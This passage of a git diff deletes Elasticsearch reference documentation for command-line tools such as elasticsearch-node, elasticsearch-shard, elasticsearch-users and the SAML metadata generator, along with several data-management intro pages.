- -In rare circumstances it may be desirable to bypass this check and start up an -{es} node using data that was written by an incompatible version. This may not -work if the format of the stored data has changed, and it is a risky process -because it is possible for the format to change in ways that {es} may -misinterpret, silently leading to data loss. - -To bypass this check, you can use the `elasticsearch-node override-version` -tool to overwrite the version number stored in the data path with the current -version, causing {es} to believe that it is compatible with the on-disk data. - -[[node-tool-unsafe-bootstrap]] -[discrete] -===== Unsafe cluster bootstrapping - -If there is at least one remaining master-eligible node, but it is not possible -to restart a majority of them, then the `elasticsearch-node unsafe-bootstrap` -command will unsafely override the cluster's <> as if performing another -<>. -The target node can then form a new cluster on its own by using -the cluster metadata held locally on the target node. - -[WARNING] -These steps can lead to arbitrary data loss since the target node may not hold the latest cluster -metadata, and this out-of-date metadata may make it impossible to use some or -all of the indices in the cluster. - -Since unsafe bootstrapping forms a new cluster containing a single node, once -you have run it you must use the <> to migrate any other surviving nodes from the failed -cluster into this new cluster. - -When you run the `elasticsearch-node unsafe-bootstrap` tool it will analyse the -state of the node and ask for confirmation before taking any action. Before -asking for confirmation it reports the term and version of the cluster state on -the node on which it runs as follows: - -[source,txt] ----- -Current node cluster state (term, version) pair is (4, 12) ----- - -If you have a choice of nodes on which to run this tool then you should choose -one with a term that is as large as possible. If there is more than one -node with the same term, pick the one with the largest version. -This information identifies the node with the freshest cluster state, which minimizes the -quantity of data that might be lost. For example, if the first node reports -`(4, 12)` and a second node reports `(5, 3)`, then the second node is preferred -since its term is larger. However if the second node reports `(3, 17)` then -the first node is preferred since its term is larger. If the second node -reports `(4, 10)` then it has the same term as the first node, but has a -smaller version, so the first node is preferred. - -[WARNING] -Running this command can lead to arbitrary data loss. Only run this tool if you -understand and accept the possible consequences and have exhausted all other -possibilities for recovery of your cluster. - -The sequence of operations for using this tool are as follows: - -1. Make sure you have really lost access to at least half of the -master-eligible nodes in the cluster, and they cannot be repaired or recovered -by moving their data paths to healthy hardware. -2. Stop **all** remaining nodes. -3. Choose one of the remaining master-eligible nodes to become the new elected -master as described above. -4. On this node, run the `elasticsearch-node unsafe-bootstrap` command as shown -below. Verify that the tool reported `Master node was successfully -bootstrapped`. -5. Start this node and verify that it is elected as the master node. -6. Run the <>, described below, on every other node in the cluster. -7. 
Start all other nodes and verify that each one joins the cluster. -8. Investigate the data in the cluster to discover if any was lost during this -process. - -When you run the tool it will make sure that the node that is being used to -bootstrap the cluster is not running. It is important that all other -master-eligible nodes are also stopped while this tool is running, but the tool -does not check this. - -The message `Master node was successfully bootstrapped` does not mean that -there has been no data loss, it just means that tool was able to complete its -job. - -[[node-tool-detach-cluster]] -[discrete] -===== Detaching nodes from their cluster - -It is unsafe for nodes to move between clusters, because different clusters -have completely different cluster metadata. There is no way to safely merge the -metadata from two clusters together. - -To protect against inadvertently joining the wrong cluster, each cluster -creates a unique identifier, known as the _cluster UUID_, when it first starts -up. Every node records the UUID of its cluster and refuses to join a -cluster with a different UUID. - -However, if a node's cluster has permanently failed then it may be desirable to -try and move it into a new cluster. The `elasticsearch-node detach-cluster` -command lets you detach a node from its cluster by resetting its cluster UUID. -It can then join another cluster with a different UUID. - -For example, after unsafe cluster bootstrapping you will need to detach all the -other surviving nodes from their old cluster so they can join the new, -unsafely-bootstrapped cluster. - -Unsafe cluster bootstrapping is only possible if there is at least one -surviving master-eligible node. If there are no remaining master-eligible nodes -then the cluster metadata is completely lost. However, the individual data -nodes also contain a copy of the index metadata corresponding with their -shards. This sometimes allows a new cluster to import these shards as -<>. You can sometimes -recover some indices after the loss of all master-eligible nodes in a cluster -by creating a new cluster and then using the `elasticsearch-node -detach-cluster` command to move any surviving nodes into this new cluster. - -There is a risk of data loss when importing a dangling index because data nodes -may not have the most recent copy of the index metadata and do not have any -information about <>. This -means that a stale shard copy may be selected to be the primary, and some of -the shards may be incompatible with the imported mapping. - -[WARNING] -Execution of this command can lead to arbitrary data loss. Only run this tool -if you understand and accept the possible consequences and have exhausted all -other possibilities for recovery of your cluster. - -The sequence of operations for using this tool are as follows: - -1. Make sure you have really lost access to every one of the master-eligible -nodes in the cluster, and they cannot be repaired or recovered by moving their -data paths to healthy hardware. -2. Start a new cluster and verify that it is healthy. This cluster may comprise -one or more brand-new master-eligible nodes, or may be an unsafely-bootstrapped -cluster formed as described above. -3. Stop **all** remaining data nodes. -4. On each data node, run the `elasticsearch-node detach-cluster` tool as shown -below. Verify that the tool reported `Node was successfully detached from the -cluster`. -5. If necessary, configure each data node to -<>. -6. Start each data node and verify that it has joined the new cluster. 
-7. Wait for all recoveries to have completed, and investigate the data in the -cluster to discover if any was lost during this process. - -The message `Node was successfully detached from the cluster` does not mean -that there has been no data loss, it just means that tool was able to complete -its job. - - -[discrete] -[[node-tool-parameters]] -=== Parameters - -`repurpose`:: Delete excess data when a node's roles are changed. - -`unsafe-bootstrap`:: Specifies to unsafely bootstrap this node as a new -one-node cluster. - -`detach-cluster`:: Specifies to unsafely detach this node from its cluster so -it can join a different cluster. - -`override-version`:: Overwrites the version number stored in the data path so -that a node can start despite being incompatible with the on-disk data. - -`remove-settings`:: Forcefully removes the provided persistent cluster settings -from the on-disk cluster state. - -`--ordinal `:: If there is <> then this specifies which node to target. Defaults -to `0`, meaning to use the first node in the data path. - -`-E `:: Configures a setting. - -`-h, --help`:: Returns all of the command parameters. - -`-s, --silent`:: Shows minimal output. - -`-v, --verbose`:: Shows verbose output. - -[discrete] -=== Examples - -[discrete] -==== Repurposing a node as a dedicated master node - -In this example, a former data node is repurposed as a dedicated master node. -First update the node's settings to `node.roles: [ "master" ]` in its -`elasticsearch.yml` config file. Then run the `elasticsearch-node repurpose` -command to find and remove excess shard data: - -[source,txt] ----- -node$ ./bin/elasticsearch-node repurpose - - WARNING: Elasticsearch MUST be stopped before running this tool. - -Found 2 shards in 2 indices to clean up -Use -v to see list of paths and indices affected -Node is being re-purposed as master and no-data. Clean-up of shard data will be performed. -Do you want to proceed? -Confirm [y/N] y -Node successfully repurposed to master and no-data. ----- - -[discrete] -==== Repurposing a node as a coordinating-only node - -In this example, a node that previously held data is repurposed as a -coordinating-only node. First update the node's settings to `node.roles: []` in -its `elasticsearch.yml` config file. Then run the `elasticsearch-node repurpose` -command to find and remove excess shard data and index metadata: - - -[source,txt] ----- -node$./bin/elasticsearch-node repurpose - - WARNING: Elasticsearch MUST be stopped before running this tool. - -Found 2 indices (2 shards and 2 index meta data) to clean up -Use -v to see list of paths and indices affected -Node is being re-purposed as no-master and no-data. Clean-up of index data will be performed. -Do you want to proceed? -Confirm [y/N] y -Node successfully repurposed to no-master and no-data. ----- - -[discrete] -==== Removing persistent cluster settings - -If your nodes contain persistent cluster settings that prevent the cluster -from forming, i.e., can't be removed using the <> API, -you can run the following commands to remove one or more cluster settings. - -[source,txt] ----- -node$ ./bin/elasticsearch-node remove-settings xpack.monitoring.exporters.my_exporter.host - - WARNING: Elasticsearch MUST be stopped before running this tool. - -The following settings will be removed: -xpack.monitoring.exporters.my_exporter.host: "10.1.2.3" - -You should only run this tool if you have incompatible settings in the -cluster state that prevent the cluster from forming. 
-This tool can cause data loss and its use should be your last resort. - -Do you want to proceed? - -Confirm [y/N] y - -Settings were successfully removed from the cluster state ----- - -You can also use wildcards to remove multiple settings, for example using - -[source,txt] ----- -node$ ./bin/elasticsearch-node remove-settings xpack.monitoring.* ----- - -[discrete] -==== Removing custom metadata from the cluster state - -If the on-disk cluster state contains custom metadata that prevents the node -from starting up and loading the cluster state, you can run the following -commands to remove this custom metadata. - -[source,txt] ----- -node$ ./bin/elasticsearch-node remove-customs snapshot_lifecycle - - WARNING: Elasticsearch MUST be stopped before running this tool. - -The following customs will be removed: -snapshot_lifecycle - -You should only run this tool if you have broken custom metadata in the -cluster state that prevents the cluster state from being loaded. -This tool can cause data loss and its use should be your last resort. - -Do you want to proceed? - -Confirm [y/N] y - -Customs were successfully removed from the cluster state ----- - -[discrete] -==== Unsafe cluster bootstrapping - -Suppose your cluster had five master-eligible nodes and you have permanently -lost three of them, leaving two nodes remaining. - -* Run the tool on the first remaining node, but answer `n` at the confirmation - step. - -[source,txt] ----- -node_1$ ./bin/elasticsearch-node unsafe-bootstrap - - WARNING: Elasticsearch MUST be stopped before running this tool. - -Current node cluster state (term, version) pair is (4, 12) - -You should only run this tool if you have permanently lost half or more -of the master-eligible nodes in this cluster, and you cannot restore the -cluster from a snapshot. This tool can cause arbitrary data loss and its -use should be your last resort. If you have multiple surviving master -eligible nodes, you should run this tool on the node with the highest -cluster state (term, version) pair. - -Do you want to proceed? - -Confirm [y/N] n ----- - -* Run the tool on the second remaining node, and again answer `n` at the - confirmation step. - -[source,txt] ----- -node_2$ ./bin/elasticsearch-node unsafe-bootstrap - - WARNING: Elasticsearch MUST be stopped before running this tool. - -Current node cluster state (term, version) pair is (5, 3) - -You should only run this tool if you have permanently lost half or more -of the master-eligible nodes in this cluster, and you cannot restore the -cluster from a snapshot. This tool can cause arbitrary data loss and its -use should be your last resort. If you have multiple surviving master -eligible nodes, you should run this tool on the node with the highest -cluster state (term, version) pair. - -Do you want to proceed? - -Confirm [y/N] n ----- - -* Since the second node has a greater term it has a fresher cluster state, so - it is better to unsafely bootstrap the cluster using this node: - -[source,txt] ----- -node_2$ ./bin/elasticsearch-node unsafe-bootstrap - - WARNING: Elasticsearch MUST be stopped before running this tool. - -Current node cluster state (term, version) pair is (5, 3) - -You should only run this tool if you have permanently lost half or more -of the master-eligible nodes in this cluster, and you cannot restore the -cluster from a snapshot. This tool can cause arbitrary data loss and its -use should be your last resort. 
If you have multiple surviving master -eligible nodes, you should run this tool on the node with the highest -cluster state (term, version) pair. - -Do you want to proceed? - -Confirm [y/N] y -Master node was successfully bootstrapped ----- - -[discrete] -==== Detaching nodes from their cluster - -After unsafely bootstrapping a new cluster, run the `elasticsearch-node -detach-cluster` command to detach all remaining nodes from the failed cluster -so they can join the new cluster: - -[source, txt] ----- -node_3$ ./bin/elasticsearch-node detach-cluster - - WARNING: Elasticsearch MUST be stopped before running this tool. - -You should only run this tool if you have permanently lost all of the -master-eligible nodes in this cluster and you cannot restore the cluster -from a snapshot, or you have already unsafely bootstrapped a new cluster -by running `elasticsearch-node unsafe-bootstrap` on a master-eligible -node that belonged to the same cluster as this node. This tool can cause -arbitrary data loss and its use should be your last resort. - -Do you want to proceed? - -Confirm [y/N] y -Node was successfully detached from the cluster ----- - -[discrete] -==== Bypassing version checks - -Run the `elasticsearch-node override-version` command to overwrite the version -stored in the data path so that a node can start despite being incompatible -with the data stored in the data path: - -[source, txt] ----- -node$ ./bin/elasticsearch-node override-version - - WARNING: Elasticsearch MUST be stopped before running this tool. - -This data path was last written by Elasticsearch version [x.x.x] and may no -longer be compatible with Elasticsearch version [y.y.y]. This tool will bypass -this compatibility check, allowing a version [y.y.y] node to start on this data -path, but a version [y.y.y] node may not be able to read this data or may read -it incorrectly leading to data loss. - -You should not use this tool. Instead, continue to use a version [x.x.x] node -on this data path. If necessary, you can use reindex-from-remote to copy the -data from here into an older cluster. - -Do you want to proceed? - -Confirm [y/N] y -Successfully overwrote this node's metadata to bypass its version compatibility checks. ----- diff --git a/docs/reference/commands/saml-metadata.asciidoc b/docs/reference/commands/saml-metadata.asciidoc deleted file mode 100644 index 9c6f2133be9..00000000000 --- a/docs/reference/commands/saml-metadata.asciidoc +++ /dev/null @@ -1,138 +0,0 @@ -[role="xpack"] -[testenv="gold+"] -[[saml-metadata]] -== elasticsearch-saml-metadata - -The `elasticsearch-saml-metadata` command can be used to generate a SAML 2.0 Service -Provider Metadata file. - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-saml-metadata -[--realm ] -[--out ] [--batch] -[--attribute ] [--service-name ] -[--locale ] [--contacts] -([--organisation-name ] [--organisation-display-name ] [--organisation-url ]) -([--signing-bundle ] | [--signing-cert ][--signing-key ]) -[--signing-key-password ] -[-E ] -[-h, --help] ([-s, --silent] | [-v, --verbose]) --------------------------------------------------- - -[discrete] -=== Description - -The SAML 2.0 specification provides a mechanism for Service Providers to -describe their capabilities and configuration using a _metadata file_. - -The `elasticsearch-saml-metadata` command generates such a file, based on the -configuration of a SAML realm in {es}. 
- -Some SAML Identity Providers will allow you to automatically import a metadata -file when you configure the Elastic Stack as a Service Provider. - -You can optionally select to digitally sign the metadata file in order to -ensure its integrity and authenticity before sharing it with the Identity Provider. -The key used for signing the metadata file need not necessarily be the same as -the keys already used in the saml realm configuration for SAML message signing. - -If your {es} keystore is password protected, you -are prompted to enter the password when you run the -`elasticsearch-saml-metadata` command. - -[discrete] -[[saml-metadata-parameters]] -=== Parameters - -`--attribute `:: Specifies a SAML attribute that should be -included as a `` element in the metadata. Any attribute -configured in the {es} realm is automatically included and does not need to be -specified as a commandline option. - -`--batch`:: Do not prompt for user input. - -`--contacts`:: Specifies that the metadata should include one or more -`` elements. The user will be prompted to enter the details for -each person. - -`-E `:: Configures an {es} setting. - -`-h, --help`:: Returns all of the command parameters. - -`--locale `:: Specifies the locale to use for metadata elements such as -``. Defaults to the JVM's default system locale. - -`--organisation-display-name ` element. -Only valid if `--organisation-name` is also specified. - -`--organisation-name `:: Specifies that an `` element should -be included in the metadata and provides the value for the ``. -If this is specified, then `--organisation-url` must also be specified. - -`--organisation-url `:: Specifies the value of the `` -element. This is required if `--organisation-name` is specified. - -`--out `:: Specifies a path for the output files. -Defaults to `saml-elasticsearch-metadata.xml` - -`--service-name `:: Specifies the value for the `` element in -the metadata. Defaults to `elasticsearch`. - -`--signing-bundle `:: Specifies the path to an existing key pair -(in PKCS#12 format). The private key of that key pair will be used to sign -the metadata file. - -`--signing-cert `:: Specifies the path to an existing certificate (in -PEM format) to be used for signing of the metadata file. You must also specify -the `--signing-key` parameter. This parameter cannot be used with the -`--signing-bundle` parameter. - -`--signing-key `:: Specifies the path to an existing key (in PEM format) -to be used for signing of the metadata file. You must also specify the -`--signing-cert` parameter. This parameter cannot be used with the -`--signing-bundle` parameter. - -`--signing-key-password `:: Specifies the password for the signing key. -It can be used with either the `--signing-key` or the `--signing-bundle` parameters. - -`--realm `:: Specifies the name of the realm for which the metadata -should be generated. This parameter is required if there is more than 1 `saml` -realm in your {es} configuration. - -`-s, --silent`:: Shows minimal output. - -`-v, --verbose`:: Shows verbose output. - -[discrete] -=== Examples - -The following command generates a default metadata file for the `saml1` realm: - -[source, sh] --------------------------------------------------- -bin/elasticsearch-saml-metadata --realm saml1 --------------------------------------------------- - -The file will be written to `saml-elasticsearch-metadata.xml`. -You may be prompted to provide the "friendlyName" value for any attributes that -are used by the realm. 
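-
-If you want the generated metadata to be signed, you can point the command at
-an existing certificate and key. A hypothetical invocation (the file names
-below are placeholders) might look like this:
-
-[source, sh]
---------------------------------------------------
-bin/elasticsearch-saml-metadata --realm saml1 \
-  --signing-cert saml-metadata-sign.crt \
-  --signing-key saml-metadata-sign.key
---------------------------------------------------
-
-If the signing key is encrypted, supply its password with the
-`--signing-key-password` parameter.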
- -The following command generates a metadata file for the `saml2` realm, with a -`` of `kibana-finance`, a locale of `en-GB` and includes -`` elements and an `` element: - -[source, sh] --------------------------------------------------- -bin/elasticsearch-saml-metadata --realm saml2 \ - --service-name kibana-finance \ - --locale en-GB \ - --contacts \ - --organisation-name "Mega Corp. Finance Team" \ - --organisation-url "http://mega.example.com/finance/" --------------------------------------------------- - diff --git a/docs/reference/commands/setup-passwords.asciidoc b/docs/reference/commands/setup-passwords.asciidoc deleted file mode 100644 index 7a443b492d4..00000000000 --- a/docs/reference/commands/setup-passwords.asciidoc +++ /dev/null @@ -1,76 +0,0 @@ -[role="xpack"] -[testenv="gold+"] -[[setup-passwords]] -== elasticsearch-setup-passwords - -The `elasticsearch-setup-passwords` command sets the passwords for the -<>. - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-setup-passwords auto|interactive -[-b, --batch] [-h, --help] [-E ] -[-s, --silent] [-u, --url ""] [-v, --verbose] --------------------------------------------------- - -[discrete] -=== Description - -This command is intended for use only during the initial configuration of the -{es} {security-features}. It uses the -<> -to run user management API requests. If your {es} keystore is password protected, -before you can set the passwords for the built-in users, you must enter the keystore password. -After you set a password for the `elastic` -user, the bootstrap password is no longer active and you cannot use this command. -Instead, you can change passwords by using the *Management > Users* UI in {kib} -or the <>. - -This command uses an HTTP connection to connect to the cluster and run the user -management requests. If your cluster uses TLS/SSL on the HTTP layer, the command -automatically attempts to establish the connection by using the HTTPS protocol. -It configures the connection by using the `xpack.security.http.ssl` settings in -the `elasticsearch.yml` file. If you do not use the default config directory -location, ensure that the *ES_PATH_CONF* environment variable returns the -correct path before you run the `elasticsearch-setup-passwords` command. You can -override settings in your `elasticsearch.yml` file by using the `-E` command -option. For more information about debugging connection failures, see -<>. - -[discrete] -[[setup-passwords-parameters]] -=== Parameters - -`auto`:: Outputs randomly-generated passwords to the console. - -`-b, --batch`:: If enabled, runs the change password process without prompting the -user. - -`-E `:: Configures a standard {es} or {xpack} setting. - -`-h, --help`:: Shows help information. - -`interactive`:: Prompts you to manually enter passwords. - -`-s, --silent`:: Shows minimal output. - -`-u, --url ""`:: Specifies the URL that the tool uses to submit the user management API -requests. The default value is determined from the settings in your -`elasticsearch.yml` file. If `xpack.security.http.ssl.enabled` is set to `true`, -you must specify an HTTPS URL. - -`-v, --verbose`:: Shows verbose output. 
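-
-These options can be combined. For instance, a run in `interactive` mode
-against a TLS-protected cluster that overrides one SSL setting from
-`elasticsearch.yml` might look like the following sketch (the URL and setting
-value are illustrative):
-
-[source,shell]
---------------------------------------------------
-bin/elasticsearch-setup-passwords interactive \
-  -u "https://localhost:9200" \
-  -E xpack.security.http.ssl.verification_mode=certificate
---------------------------------------------------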
- -[discrete] -=== Examples - -The following example uses the `-u` parameter to tell the tool where to submit -its user management API requests: - -[source,shell] --------------------------------------------------- -bin/elasticsearch-setup-passwords auto -u "http://localhost:9201" --------------------------------------------------- diff --git a/docs/reference/commands/shard-tool.asciidoc b/docs/reference/commands/shard-tool.asciidoc deleted file mode 100644 index 42069e50325..00000000000 --- a/docs/reference/commands/shard-tool.asciidoc +++ /dev/null @@ -1,123 +0,0 @@ -[[shard-tool]] -== elasticsearch-shard - -In some cases the Lucene index or translog of a shard copy can become corrupted. -The `elasticsearch-shard` command enables you to remove corrupted parts of the -shard if a good copy of the shard cannot be recovered automatically or restored -from backup. - -[WARNING] -You will lose the corrupted data when you run `elasticsearch-shard`. This tool -should only be used as a last resort if there is no way to recover from another -copy of the shard or restore a snapshot. - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-shard remove-corrupted-data - ([--index ] [--shard-id ] | [--dir ]) - [--truncate-clean-translog] - [-E ] - [-h, --help] ([-s, --silent] | [-v, --verbose]) --------------------------------------------------- - -[discrete] -=== Description - -When {es} detects that a shard's data is corrupted, it fails that shard copy and -refuses to use it. Under normal conditions, the shard is automatically recovered -from another copy. If no good copy of the shard is available and you cannot -restore one from a snapshot, you can use `elasticsearch-shard` to remove the -corrupted data and restore access to any remaining data in unaffected segments. - -[WARNING] -Stop Elasticsearch before running `elasticsearch-shard`. - -To remove corrupted shard data use the `remove-corrupted-data` subcommand. - -There are two ways to specify the path: - -* Specify the index name and shard name with the `--index` and `--shard-id` - options. -* Use the `--dir` option to specify the full path to the corrupted index or - translog files. - -[discrete] -==== Removing corrupted data - -`elasticsearch-shard` analyses the shard copy and provides an overview of the -corruption found. To proceed you must then confirm that you want to remove the -corrupted data. - -[WARNING] -Back up your data before running `elasticsearch-shard`. This is a destructive -operation that removes corrupted data from the shard. - -[source,txt] --------------------------------------------------- -$ bin/elasticsearch-shard remove-corrupted-data --index my-index-000001 --shard-id 0 - - - WARNING: Elasticsearch MUST be stopped before running this tool. - - Please make a complete backup of your index before using this tool. - - -Opening Lucene index at /var/lib/elasticsearchdata/nodes/0/indices/P45vf_YQRhqjfwLMUvSqDw/0/index/ - - >> Lucene index is corrupted at /var/lib/elasticsearchdata/nodes/0/indices/P45vf_YQRhqjfwLMUvSqDw/0/index/ - -Opening translog at /var/lib/elasticsearchdata/nodes/0/indices/P45vf_YQRhqjfwLMUvSqDw/0/translog/ - - - >> Translog is clean at /var/lib/elasticsearchdata/nodes/0/indices/P45vf_YQRhqjfwLMUvSqDw/0/translog/ - - - Corrupted Lucene index segments found - 32 documents will be lost. - - WARNING: YOU WILL LOSE DATA. - -Continue and remove docs from the index ? 
Y - -WARNING: 1 broken segments (containing 32 documents) detected -Took 0.056 sec total. -Writing... -OK -Wrote new segments file "segments_c" -Marking index with the new history uuid : 0pIBd9VTSOeMfzYT6p0AsA -Changing allocation id V8QXk-QXSZinZMT-NvEq4w to tjm9Ve6uTBewVFAlfUMWjA - -You should run the following command to allocate this shard: - -POST /_cluster/reroute -{ - "commands" : [ - { - "allocate_stale_primary" : { - "index" : "index42", - "shard" : 0, - "node" : "II47uXW2QvqzHBnMcl2o_Q", - "accept_data_loss" : false - } - } - ] -} - -You must accept the possibility of data loss by changing the `accept_data_loss` parameter to `true`. - -Deleted corrupt marker corrupted_FzTSBSuxT7i3Tls_TgwEag from /var/lib/elasticsearchdata/nodes/0/indices/P45vf_YQRhqjfwLMUvSqDw/0/index/ - --------------------------------------------------- - -When you use `elasticsearch-shard` to drop the corrupted data, the shard's -allocation ID changes. After restarting the node, you must use the -<> to tell Elasticsearch to use the new ID. -The `elasticsearch-shard` command shows the request that you need to submit. - -You can also use the `-h` option to get a list of all options and parameters -that the `elasticsearch-shard` tool supports. - -Finally, you can use the `--truncate-clean-translog` option to truncate the -shard's translog even if it does not appear to be corrupt. diff --git a/docs/reference/commands/syskeygen.asciidoc b/docs/reference/commands/syskeygen.asciidoc deleted file mode 100644 index a42bb3b6bd7..00000000000 --- a/docs/reference/commands/syskeygen.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[role="xpack"] -[testenv="gold+"] -[[syskeygen]] -== elasticsearch-syskeygen - -The `elasticsearch-syskeygen` command creates a system key file in the -elasticsearch config directory. - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-syskeygen -[-E ] [-h, --help] -([-s, --silent] | [-v, --verbose]) --------------------------------------------------- - -[discrete] -=== Description - -The command generates a `system_key` file, which you can use to symmetrically -encrypt sensitive data. For example, you can use this key to prevent {watcher} -from returning and storing information that contains clear text credentials. See -<>. - -IMPORTANT: The system key is a symmetric key, so the same key must be used on -every node in the cluster. - -[discrete] -[[syskeygen-parameters]] -=== Parameters - -`-E `:: Configures a setting. For example, if you have a custom -installation of {es}, you can use this parameter to specify the `ES_PATH_CONF` -environment variable. - -`-h, --help`:: Returns all of the command parameters. - -`-s, --silent`:: Shows minimal output. - -`-v, --verbose`:: Shows verbose output. 
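If your configuration lives outside the default config directory, point the `ES_PATH_CONF` environment variable at it before running the command. The following is a minimal sketch with a placeholder path:

[source,shell]
--------------------------------------------------
ES_PATH_CONF=/etc/elasticsearch-custom bin/elasticsearch-syskeygen
--------------------------------------------------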
- - -[discrete] -=== Examples - -The following command generates a `system_key` file in the -default `$ES_HOME/config` directory: - -[source, sh] --------------------------------------------------- -bin/elasticsearch-syskeygen --------------------------------------------------- diff --git a/docs/reference/commands/users-command.asciidoc b/docs/reference/commands/users-command.asciidoc deleted file mode 100644 index dca812db06f..00000000000 --- a/docs/reference/commands/users-command.asciidoc +++ /dev/null @@ -1,137 +0,0 @@ -[role="xpack"] -[testenv="gold+"] -[[users-command]] -== elasticsearch-users - -If you use file-based user authentication, the `elasticsearch-users` command -enables you to add and remove users, assign user roles, and manage passwords. - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-users -([useradd ] [-p ] [-r ]) | -([list] ) | -([passwd ] [-p ]) | -([roles ] [-a ] [-r ]) | -([userdel ]) --------------------------------------------------- - -[discrete] -=== Description - -If you use the built-in `file` internal realm, users are defined in local files -on each node in the cluster. - -Usernames and roles must be at least 1 and no more than 1024 characters. They -can contain alphanumeric characters (`a-z`, `A-Z`, `0-9`), spaces, punctuation, -and printable symbols in the -{wikipedia}/Basic_Latin_(Unicode_block)[Basic Latin (ASCII) block]. -Leading or trailing whitespace is not allowed. - -Passwords must be at least 6 characters long. - -For more information, see <>. - -TIP: To ensure that {es} can read the user and role information at startup, run -`elasticsearch-users useradd` as the same user you use to run {es}. Running the -command as root or some other user updates the permissions for the `users` and -`users_roles` files and prevents {es} from accessing them. - -[discrete] -[[users-command-parameters]] -=== Parameters - -`-a `:: If used with the `roles` parameter, adds a comma-separated list -of roles to a user. - -//`-h, --help`:: Returns all of the command parameters. - -`list`:: List the users that are registered with the `file` realm -on the local node. If you also specify a user name, the command provides -information for that user. - -`-p `:: Specifies the user's password. If you do not specify this -parameter, the command prompts you for the password. -+ --- -TIP: Omit the `-p` option to keep -plaintext passwords out of the terminal session's command history. - --- - -`passwd `:: Resets a user's password. You can specify the new -password directly with the `-p` parameter. - -`-r `:: -* If used with the `useradd` parameter, defines a user's roles. This option -accepts a comma-separated list of role names to assign to the user. -* If used with the `roles` parameter, removes a comma-separated list of roles -from a user. - -`roles`:: Manages the roles of a particular user. You can combine adding and -removing roles within the same command to change a user's roles. - -//`-s, --silent`:: Shows minimal output. - -`useradd `:: Adds a user to your local node. - -`userdel `:: Deletes a user from your local node. - -//`-v, --verbose`:: Shows verbose output. - -//[discrete] -//=== Authorization - -[discrete] -=== Examples - -The following example adds a new user named `jacknich` to the `file` realm. The -password for this user is `theshining`, and this user is associated with the -`network` and `monitoring` roles. 
- -[source,shell] -------------------------------------------------------------------- -bin/elasticsearch-users useradd jacknich -p theshining -r network,monitoring -------------------------------------------------------------------- - -The following example lists the users that are registered with the `file` realm -on the local node: - -[source, shell] ----------------------------------- -bin/elasticsearch-users list -rdeniro : admin -alpacino : power_user -jacknich : monitoring,network ----------------------------------- - -Users are in the left-hand column and their corresponding roles are listed in -the right-hand column. - -The following example resets the `jacknich` user's password: - -[source,shell] --------------------------------------------------- -bin/elasticsearch-users passwd jachnich --------------------------------------------------- - -Since the `-p` parameter was omitted, the command prompts you to enter and -confirm a password in interactive mode. - -The following example removes the `network` and `monitoring` roles from the -`jacknich` user and adds the `user` role: - -[source,shell] ------------------------------------------------------------- -bin/elasticsearch-users roles jacknich -r network,monitoring -a user ------------------------------------------------------------- - -The following example deletes the `jacknich` user: - -[source,shell] --------------------------------------------------- -bin/elasticsearch-users userdel jacknich --------------------------------------------------- diff --git a/docs/reference/data-management.asciidoc b/docs/reference/data-management.asciidoc deleted file mode 100644 index dc5ca9bd7f2..00000000000 --- a/docs/reference/data-management.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ -[role="xpack"] -[[data-management]] -= Data management - -[partintro] --- -The data you store in {es} generally falls into one of two categories: - -* Content: a collection of items you want to search, such as a catalog of products -* Time series data: a stream of continuously-generated timestamped data, such as log entries - -Content might be frequently updated, -but the value of the content remains relatively constant over time. -You want to be able to retrieve items quickly regardless of how old they are. - -Time series data keeps accumulating over time, so you need strategies for -balancing the value of the data against the cost of storing it. -As it ages, it tends to become less important and less-frequently accessed, -so you can move it to less expensive, less performant hardware. -For your oldest data, what matters is that you have access to the data. -It's ok if queries take longer to complete. - -To help you manage your data, {es} enables you to: - -* Define <> of data nodes with different performance characteristics. -* Automatically transition indices through the data tiers according to your performance needs and retention policies -with <> ({ilm-init}). -* Leverage <> stored in a remote repository to provide resiliency -for your older indices while reducing operating costs and maintaining search performance. -* Perform <> of data stored on less-performant hardware. 
--- - -include::datatiers.asciidoc[] - -include::indices/index-mgmt.asciidoc[] diff --git a/docs/reference/data-rollup-transform.asciidoc b/docs/reference/data-rollup-transform.asciidoc deleted file mode 100644 index 81ed4a50788..00000000000 --- a/docs/reference/data-rollup-transform.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -[[data-rollup-transform]] -= Roll up or transform your data - -[partintro] --- - -{es} offers the following methods for manipulating your data: - -* <> -+ -include::rollup/index.asciidoc[tag=rollup-intro] -* <> -+ -include::transform/transforms.asciidoc[tag=transform-intro] - --- - -include::rollup/index.asciidoc[] - -include::transform/index.asciidoc[] diff --git a/docs/reference/data-streams/change-mappings-and-settings.asciidoc b/docs/reference/data-streams/change-mappings-and-settings.asciidoc deleted file mode 100644 index fb828b5a770..00000000000 --- a/docs/reference/data-streams/change-mappings-and-settings.asciidoc +++ /dev/null @@ -1,673 +0,0 @@ -[role="xpack"] -[[data-streams-change-mappings-and-settings]] -== Change mappings and settings for a data stream - -Each data stream has a <>. Mappings and index settings from this template are applied to new -backing indices created for the stream. This includes the stream's first -backing index, which is auto-generated when the stream is created. - -Before creating a data stream, we recommend you carefully consider which -mappings and settings to include in this template. - -If you later need to change the mappings or settings for a data stream, you have -a few options: - -* <> -* <> -* <> -* <> - -TIP: If your changes include modifications to existing field mappings or -<>, a reindex is often required to -apply the changes to a data stream's backing indices. If you are already -performing a reindex, you can use the same process to add new field -mappings and change <>. See -<>. - -//// -[source,console] ----- -PUT /_ilm/policy/my-data-stream-policy -{ - "policy": { - "phases": { - "hot": { - "actions": { - "rollover": { - "max_size": "25GB" - } - } - }, - "delete": { - "min_age": "30d", - "actions": { - "delete": {} - } - } - } - } -} - -PUT /_index_template/my-data-stream-template -{ - "index_patterns": [ "my-data-stream*" ], - "data_stream": { } -} - -PUT /_index_template/new-data-stream-template -{ - "index_patterns": [ "new-data-stream*" ], - "data_stream": { } -} - -PUT /_data_stream/my-data-stream - -POST /my-data-stream/_rollover/ - -PUT /_data_stream/new-data-stream ----- -// TESTSETUP - -[source,console] ----- -DELETE /_data_stream/* - -DELETE /_index_template/* - -DELETE /_ilm/policy/my-data-stream-policy ----- -// TEARDOWN -//// - -[discrete] -[[add-new-field-mapping-to-a-data-stream]] -=== Add a new field mapping to a data stream - -To add a mapping for a new field to a data stream, following these 